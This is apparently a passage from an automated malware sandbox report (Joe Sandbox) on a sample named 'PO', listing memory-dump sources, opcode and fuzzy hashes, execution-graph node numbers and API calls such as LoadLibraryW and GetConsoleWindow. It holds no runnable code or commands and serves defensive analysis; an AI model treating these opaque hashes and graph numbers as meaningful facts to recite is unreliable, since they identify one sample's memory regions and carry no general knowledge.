                        • Opcode ID: dd71d9ecbcec1b71549ebac56ce1b16f8e77ca0b508553ebe9079293a19888b5
                        • Instruction ID: 6743d2076f762ec1950f96d8576371b1a485e868199699181b9bbda88f8922d7
                        • Opcode Fuzzy Hash: dd71d9ecbcec1b71549ebac56ce1b16f8e77ca0b508553ebe9079293a19888b5
                        • Instruction Fuzzy Hash: 43011D39849268CFDB74CF15C8447F8B7B4EB4A321F04D5AA840DA6292C6344ECACF60
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b01f275a223936add50d180cf5e443e0044c5821b9d2f6a4c12f3a6e0661b928
                        • Instruction ID: 3ab1271f3edb4e46f8b1018d019f3e7509109e4244b89496959b5f0f5552c8d2
                        • Opcode Fuzzy Hash: b01f275a223936add50d180cf5e443e0044c5821b9d2f6a4c12f3a6e0661b928
                        • Instruction Fuzzy Hash: 57F0E9357093A05BDB269626D8653D97F669FC3614B0D40BFD4848B187CD58480587D6
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5766f0211f0b2d405595ff6f64fff09ca85facb49a87567b2d86741a275b7cb9
                        • Instruction ID: 1285627de23bc8e8bda344c11dcf8b31d89e8c595986082316df0e8ff86a6964
                        • Opcode Fuzzy Hash: 5766f0211f0b2d405595ff6f64fff09ca85facb49a87567b2d86741a275b7cb9
                        • Instruction Fuzzy Hash: 92F04F34909228CFEB50CE24C984BE8B7B4AB05300F1490D9D04EA7252C7355F8ACF10
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8154616e28e29ffa75954e259c8251722b676b4deb18f027e045fd8b597e4ff
                        • Instruction ID: 82e8bdf561b2eff03cb8cedfeda837aaea65380a1d91621e97aacebb2263223d
                        • Opcode Fuzzy Hash: e8154616e28e29ffa75954e259c8251722b676b4deb18f027e045fd8b597e4ff
                        • Instruction Fuzzy Hash: 470169359082A89FCB61CF64CD906E8BFB5EF0A300F1440E9D449A72A2C7355E86CF11
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 840a2c53b754c8a81c62bc1a50769168edec0af760d503fb59556b8ff7e3e571
                        • Instruction ID: 31858ab056e984efa7030bf0a91d17115a36389602e122693f11365353b2e08c
                        • Opcode Fuzzy Hash: 840a2c53b754c8a81c62bc1a50769168edec0af760d503fb59556b8ff7e3e571
                        • Instruction Fuzzy Hash: 28F0C478A082189FDB65CFA5DC80AE9BBB9BB49310F1090A9D50DAB251D7355D42CF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 501b0fc1d77094cc8260453a1b729f9058d10065eaa326efaf155230ba7572cb
                        • Instruction ID: ac3895b3d90c3417e73d0bd3e35ebeac71570fac0ba77e8104d7c3f3c085e094
                        • Opcode Fuzzy Hash: 501b0fc1d77094cc8260453a1b729f9058d10065eaa326efaf155230ba7572cb
                        • Instruction Fuzzy Hash: 9401F678904228DFCB65CF64C8957D8BBF0BB4A314F1485DA891DA3282C7758ECACF40
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46f5a07c62dee08bb3c7ea26e47480c9ef624cabd4a1e46771568aae5099baf3
                        • Instruction ID: c4d54f19cd031d0ae2f029f5db13bae9166855f22d53e919d3695b8898c1d5e4
                        • Opcode Fuzzy Hash: 46f5a07c62dee08bb3c7ea26e47480c9ef624cabd4a1e46771568aae5099baf3
                        • Instruction Fuzzy Hash: D0F0E275904228DFDB60CF64DC44BD8BBF4EB48305F10809AD509A7241D7349E85CF54
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c25bd4d7ba145176d3dd7e798f8a955be2d1317b7cfbfff11df93d809f80f8bb
                        • Instruction ID: aca10e2f0ba467dd089db2f68d4bd4955eeaf32e46e38b69e9ace0f9c76d53f7
                        • Opcode Fuzzy Hash: c25bd4d7ba145176d3dd7e798f8a955be2d1317b7cfbfff11df93d809f80f8bb
                        • Instruction Fuzzy Hash: C4F017758043589FCB51CF64CC44BD9BBF4AB46310F1481DAD508AB292D7799E85CF54
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00e5bd929e3ef255a2c06753ea1e78199a129f1d543259483c9e019bb4c5f140
                        • Instruction ID: c86b3f490db8ca7c844c53c11e0404bc6eed1949d9a87c9aebf5fb75bec7584e
                        • Opcode Fuzzy Hash: 00e5bd929e3ef255a2c06753ea1e78199a129f1d543259483c9e019bb4c5f140
                        • Instruction Fuzzy Hash: 4AF09276904228DFCB64DFA4CD80BDDBBB5FB48301F6040EA9109A7261DB369E86DF44
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8028963ecec88931a3a5995916aff4036f91959caaa419acedda8024a61a9454
                        • Instruction ID: 562cda5824aa65371a9dab992710f7313d4e9376ff08e38d71f871021c8ee509
                        • Opcode Fuzzy Hash: 8028963ecec88931a3a5995916aff4036f91959caaa419acedda8024a61a9454
                        • Instruction Fuzzy Hash: 87E026F3A0D060BFF3214688AC60030BB94FAE21523C8C6CBD446CB562D706D10BD310
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63d5ac6d59200215884bf55dc992d19fc56598d8f65f4d6dbc13b5bebc58d0f1
                        • Instruction ID: 8ab725f8e139de2fbf8b6fff18b1e085438b7999f20b5e9400c5b43c520b25b5
                        • Opcode Fuzzy Hash: 63d5ac6d59200215884bf55dc992d19fc56598d8f65f4d6dbc13b5bebc58d0f1
                        • Instruction Fuzzy Hash: FAE0C938404269DFEB74CF55C8447E8BBB8AB4A310F14C29A841966292C2359F8BCF60
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba5b7671ee5b5cab33e473f0defdc9bc9feb9b67a60a2056be16854696267e6b
                        • Instruction ID: d3945aa865bd1c49dbaa4b0573e9f47d0d4700cdd76576b047969700a6c9d9bb
                        • Opcode Fuzzy Hash: ba5b7671ee5b5cab33e473f0defdc9bc9feb9b67a60a2056be16854696267e6b
                        • Instruction Fuzzy Hash: 23E02B7180120CEFE314E774E812B997768CF01221F1440AED404D7212CB399F50CB91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e477d79d3a19e42e8197400df0a4edb04619d92f8249229a2f221c9732ebaf56
                        • Instruction ID: 42388fcbd055901a3a4c2615b05b0add3c232c4816979d611ddb1e34236bc1c8
                        • Opcode Fuzzy Hash: e477d79d3a19e42e8197400df0a4edb04619d92f8249229a2f221c9732ebaf56
                        • Instruction Fuzzy Hash: A1D02336710534934915311F78244FFB94FDAC5F21606402FF10D8734CCD654C0507D5
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46328f673660d48cd1efdd7cedde7c06d3b5db59335d392abbc2b17f3381001e
                        • Instruction ID: ac66763879d79a149d4d10bb751648d1332bda25042a04ad3176fb56f9c4ec7d
                        • Opcode Fuzzy Hash: 46328f673660d48cd1efdd7cedde7c06d3b5db59335d392abbc2b17f3381001e
                        • Instruction Fuzzy Hash: 7AE0B638904128DFCB24CF60CA44AE8BBF5AB49304F04D4EA8409A7252C3359E8ACF50
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecab70d5d5f42dea2224a7a81c74a16dea80b464511f9cfd997f691d08aced1d
                        • Instruction ID: 3171ed9aec54c99f6dfed209cb63041c893ec5ded9b870b29870ad2ceed2014a
                        • Opcode Fuzzy Hash: ecab70d5d5f42dea2224a7a81c74a16dea80b464511f9cfd997f691d08aced1d
                        • Instruction Fuzzy Hash: FCD02270C0220CDBE328EBB8E001A9D773CDF01211F1000BDC40407210CB764E81CF91
                        Memory Dump Source
                        • Source File: 00000007.00000002.2161091943.000000000A720000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_a720000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83f0c7c8a9e2d36f744a3c9aa0eb7e4a1d924b7afcabd5008bdcc534ed4f2cbc
                        • Instruction ID: 226f51b1cb096b59ac42eadd8ab8e39cd55073a5d11895b1af8e9d13fbdd9caa
                        • Opcode Fuzzy Hash: 83f0c7c8a9e2d36f744a3c9aa0eb7e4a1d924b7afcabd5008bdcc534ed4f2cbc
                        • Instruction Fuzzy Hash: 64E0BD38904228CFCB20CF60CA40AE8BBF5AB49304F04C4EA8409A7252C33A9E86CF40

                        Execution Graph

                        Execution Coverage:13.8%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:30
                        Total number of Limit Nodes:1
                        execution_graph 28902 14b0871 28906 14b08c8 28902->28906 28911 14b08d8 28902->28911 28903 14b0889 28907 14b08fa 28906->28907 28916 14b0ce8 28907->28916 28920 14b0ce0 28907->28920 28908 14b093e 28908->28903 28912 14b08fa 28911->28912 28914 14b0ce8 GetConsoleWindow 28912->28914 28915 14b0ce0 GetConsoleWindow 28912->28915 28913 14b093e 28913->28903 28914->28913 28915->28913 28917 14b0d26 GetConsoleWindow 28916->28917 28919 14b0d56 28917->28919 28919->28908 28921 14b0d26 GetConsoleWindow 28920->28921 28923 14b0d56 28921->28923 28923->28908 28884 6ac6361 28885 6ac62fc 28884->28885 28887 6ac636a 28884->28887 28890 6ac7400 28885->28890 28894 6ac73f1 28885->28894 28886 6ac631d 28891 6ac7448 28890->28891 28893 6ac7451 28891->28893 28898 6ac6f98 28891->28898 28893->28886 28896 6ac7400 28894->28896 28895 6ac7451 28895->28886 28896->28895 28897 6ac6f98 LoadLibraryW 28896->28897 28897->28895 28899 6ac75f0 LoadLibraryW 28898->28899 28901 6ac7665 28899->28901 28901->28893
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275732228.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6ac0000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 88977afe4cca94dd124d9eb585ccad688bb2c4c40b9c393db4a8c68add3afb87
                        • Instruction ID: c664c20c5319f7f0bcfe94b9b79b5fe8f305c4250de9f0a6d8a45abd769d9375
                        • Opcode Fuzzy Hash: 88977afe4cca94dd124d9eb585ccad688bb2c4c40b9c393db4a8c68add3afb87
                        • Instruction Fuzzy Hash: D711E2B6D006498FDB10DF9AC844A9EFBF4EF88320F14841AE419B7310D775A545CFA5
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,06AC74A6), ref: 06AC7656
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275732228.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6ac0000_PO.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6e5805706e2bfdaedaa66e8f090fc9afa411f9616f41e4de0a4c2581efd500bd
                        • Instruction ID: aeee12887986e80a8b0c6b77ab5d8cf86be3956153f1159b2e857ec8fee4907a
                        • Opcode Fuzzy Hash: 6e5805706e2bfdaedaa66e8f090fc9afa411f9616f41e4de0a4c2581efd500bd
                        • Instruction Fuzzy Hash: A81123B6C006498FCB20DF9AC844ADEFBF4EF88320F14842AE419A7310D375A545CFA0
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 014B0D47
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2264252460.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_14b0000_PO.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: 16d39ce1958365333a54998d0cedaad0bed13dbd96533aeb2927ab29300ef7a7
                        • Instruction ID: a1607277f06a37c99e3cf13b8bb9368c6d5350aed1b6643bf5e4dc199e34a531
                        • Opcode Fuzzy Hash: 16d39ce1958365333a54998d0cedaad0bed13dbd96533aeb2927ab29300ef7a7
                        • Instruction Fuzzy Hash: D61128759102098FDB24DFAAC9897DFBBF5EF88320F14881AD419A7250CB35A545CBA4
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 014B0D47
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2264252460.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_14b0000_PO.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID:
                        • API String ID: 2863861424-0
                        • Opcode ID: d69221c1e3e8c87d6a2ef9c5720b7bb72faf2541e230bc88d5b51a01bbc661df
                        • Instruction ID: 53b8fe021c5ca9a6d06af3e07767073ff5721739ff6750bff3f2549c3213f492
                        • Opcode Fuzzy Hash: d69221c1e3e8c87d6a2ef9c5720b7bb72faf2541e230bc88d5b51a01bbc661df
                        • Instruction Fuzzy Hash: D71125719002098FDB20DFAAC8857DFBFF8EF48320F14841AD519A7250CB39A5448BA0
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94a9e775b53db7ceabe66b4ce4ffc0b2063702dcfd9039c16b69b8bb6e315db8
                        • Instruction ID: dd572335965b3e417b5063f3514fa787d98d35eb3ecbc43f2cb84e1b4f8e45a0
                        • Opcode Fuzzy Hash: 94a9e775b53db7ceabe66b4ce4ffc0b2063702dcfd9039c16b69b8bb6e315db8
                        • Instruction Fuzzy Hash: F0C26D75E002189FCB55CF58C851EADBBB2FF88704F5180D9E606AB361DB71AE818F91
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0eb82ee272d62e06315d90bf0bb7fe2483cf4afe1271ead6f7e26fae5ab0c98e
                        • Instruction ID: 68e3dfec9913f63a016f90e4cdd47b6c3cf1b456693450aa34dcf776a370e316
                        • Opcode Fuzzy Hash: 0eb82ee272d62e06315d90bf0bb7fe2483cf4afe1271ead6f7e26fae5ab0c98e
                        • Instruction Fuzzy Hash: 89B1C3B4B042449FCB55CB78C854E6EBBF2EF89704B5484AAE916DB3A1DB30DC05CB51
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dad5bb907ffb1472f236191dad181cf0ae30beced7c37429b27679b58233d78a
                        • Instruction ID: 50e9cf5faec780e9a745d7b74d0794b02b18451f14a895825e72dc56b0e4b569
                        • Opcode Fuzzy Hash: dad5bb907ffb1472f236191dad181cf0ae30beced7c37429b27679b58233d78a
                        • Instruction Fuzzy Hash: D54269B0700A258FCB65AF68D45066EBBB2FFC1704B414A9CD503AF391CB79ED858B85
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9fa8b040997e88cf4a2afcceb61f0b469b2a689e22d175e665ae5933b26398ad
                        • Instruction ID: 18033d31bb8cb9961ff86db7e7e34a1036c71b83e0010872cfd0b18ff7911a5e
                        • Opcode Fuzzy Hash: 9fa8b040997e88cf4a2afcceb61f0b469b2a689e22d175e665ae5933b26398ad
                        • Instruction Fuzzy Hash: 54D1C1B0B00608DFDB41DF64C855A6A7BB6FF89704F50819AE9029F3A2CBB1DD45CB91
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6caf59e0dde6c93433110a497b9fd90f464067a140d12e414abe076b81988d1
                        • Instruction ID: 12f5f9b8b2f752842d46fcbab7c038b2550571b616675700ea50e482c727e4a9
                        • Opcode Fuzzy Hash: e6caf59e0dde6c93433110a497b9fd90f464067a140d12e414abe076b81988d1
                        • Instruction Fuzzy Hash: 2AC15939B50104AFCB44CF98C895E9DBBB2FF89704B508099EA029F361CA72FD158B55
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e265ef6ec8df5e1cb4d4d41af7ce2257bf8ce23c092f4b3a14e755d2791b8710
                        • Instruction ID: 4670dac76d3da6da03160d7d4d3e7a5760bba6055e44bf85c3e9404b1e834f54
                        • Opcode Fuzzy Hash: e265ef6ec8df5e1cb4d4d41af7ce2257bf8ce23c092f4b3a14e755d2791b8710
                        • Instruction Fuzzy Hash: 73C15FB0B00608EFDB44DF65C855A6A7BB6FF88704F508199E9029F3A1CBB1DD85CB91
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3586252ba064ea058b0f4400fa4f78bb9a3762b7f66837bd2165a446eef74378
                        • Instruction ID: 65873437b4028e3afb674bb3e7c00515ed8fafc79684c1a0ec49bb6eb815d5c0
                        • Opcode Fuzzy Hash: 3586252ba064ea058b0f4400fa4f78bb9a3762b7f66837bd2165a446eef74378
                        • Instruction Fuzzy Hash: 21918F75B50204AFCB54DF69C894E9ABBF2FF89710B1580A9E9059F362DB31EC01CB91
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_6b10000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f289c309a13dee96554fc086df15abe00d6bd76a97fe465d4228a2ed043fbd8a
                        • Instruction ID: 191e6d2b6a36c01f6feedfeb22539b1447a0c1c9271d850b51c8ae66e7c0d9ed
                        • Opcode Fuzzy Hash: f289c309a13dee96554fc086df15abe00d6bd76a97fe465d4228a2ed043fbd8a
                        • Instruction Fuzzy Hash: B3616A71704745EFCB61AF7ED84046ABBA6EFC1220B6481BFDA058F654EB31C841C7A1
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263097497.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_134d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53db5ba2026fef8adbaaf4db191a1c664dde4bfcf0762f7a8d93d237f895b828
                        • Instruction ID: 838ee93920df925c42a08e6ce7a706801442a36d58acd09ee76bb8b2d4db133f
                        • Opcode Fuzzy Hash: 53db5ba2026fef8adbaaf4db191a1c664dde4bfcf0762f7a8d93d237f895b828
                        • Instruction Fuzzy Hash: C0214872504244DFCF16DF98D8C0B26BFA5FB98318F24C668ED090B646C33AE416CBA1
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263159684.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_135d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d34e0d36b938da35a9516c9212f34995d5994987203f748863bd279e1032d254
                        • Instruction ID: 609290f255c789113ba7a5e26ee933631d0a798975e576cce3f2ab2a17469e1d
                        • Opcode Fuzzy Hash: d34e0d36b938da35a9516c9212f34995d5994987203f748863bd279e1032d254
                        • Instruction Fuzzy Hash: 0D2123B1604244DFDB41DF98D984F2ABB69FB84B28F24C569DC094B347C33AD406CAA1
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263159684.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_135d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b50ea2e5f3e7086d616c8f3fb697ac945c94dc9cd416bbb761e3c01cf490c01e
                        • Instruction ID: eb90f3c563808059bd5590cdcf195d8a19ab4b39b682e41056f334778818a20a
                        • Opcode Fuzzy Hash: b50ea2e5f3e7086d616c8f3fb697ac945c94dc9cd416bbb761e3c01cf490c01e
                        • Instruction Fuzzy Hash: E72100B1504204DFDB42CF68C980F26BBA5EB8871CF20C96DDD090B656C73AD806CA61
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263097497.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_134d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction ID: 57ba5074a8b8bd6bd8c947b5f7980c35eecd93c50b99be0a211e5f8230b05213
                        • Opcode Fuzzy Hash: f3b49ebb3647464524db950c25b84bc30cf7f483e8b35816b047356ddc5e1881
                        • Instruction Fuzzy Hash: 6C21CD76504280DFDB06CF44D9C4B16BFB2FB88318F2482A9DD480A656C33AE426CB91
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263159684.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_135d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                        • Instruction ID: 90cb2d26ff16c86c5498aafb8e142a4660e09bf113be57b3cd79f963af0f77c4
                        • Opcode Fuzzy Hash: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                        • Instruction Fuzzy Hash: C3119D76504280CFDB12CF54D5C4B1ABB61FB84728F24C6AADC494B657C33AD40ACBA2
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263159684.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_135d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction ID: 603259a4695a14eae046aba01d645b8a971a4fb88e9043c24dfcfd62984bebfd
                        • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                        • Instruction Fuzzy Hash: 4811BB75504280CFDB02CF58C5C4B15BFA1FB8571CF24CAAADD494B266C33AD40ACB62
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263097497.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_134d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bdb820107b65b0f1ef096ae881ff8cb83df2d64237089ff36edbfccfef29bde4
                        • Instruction ID: a2e56f1e309b06b4cd4ead14e48a1508915f7010d3bd9c6138bd4c6457fe008d
                        • Opcode Fuzzy Hash: bdb820107b65b0f1ef096ae881ff8cb83df2d64237089ff36edbfccfef29bde4
                        • Instruction Fuzzy Hash: 3801A2721083449BE7219E59CDC4B66FFECDF61339F18C41AED090A286C679A840CAB1
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2263097497.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_15_2_134d000_PO.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6460aa518c3e1bcf2822ea0f8c1a38290e044826c0200d1ea2ab7756589ff120
                        • Instruction ID: 9540b17702ef1a488debc95ef08707dffe4e1bb54d87b213981055ad07aba4a4
                        • Opcode Fuzzy Hash: 6460aa518c3e1bcf2822ea0f8c1a38290e044826c0200d1ea2ab7756589ff120
                        • Instruction Fuzzy Hash: 90F062724043449BE7118E19CDC4B62FFD8EF91739F18C45AFD084B286C279A844CAB1
                        Strings
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2275838561.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
